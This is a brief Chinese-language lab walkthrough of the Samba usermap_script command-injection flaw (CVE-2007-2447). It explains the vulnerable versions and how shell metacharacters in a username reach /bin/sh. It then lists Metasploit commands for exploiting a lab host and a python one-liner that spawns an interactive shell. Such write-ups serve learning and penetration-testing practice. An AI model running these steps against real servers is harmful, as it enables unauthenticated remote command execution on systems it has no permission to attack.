Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述
- Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。
- 该软件支持共享打印机、互相传输资料文件等。
- Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
- Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
- 如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
- usermap_script:CVE-2007-2447
- Samba用户名映射脚本命令执行
- 传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,
- 在smb.conf中,导致允许远程命令执行。
- Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
- 通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
- 不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名
msfconsole
search samba
Use exploit/multi/samba/usermap_script
show options
Set RHOST 192.168.160.131 设置要攻击的机器IP
exploit
进入交付模式
python -c ‘import pty;pty.spawn("/bin/sh")’
只有这样,生活才会揭示在我们眼前。
– 小野洋子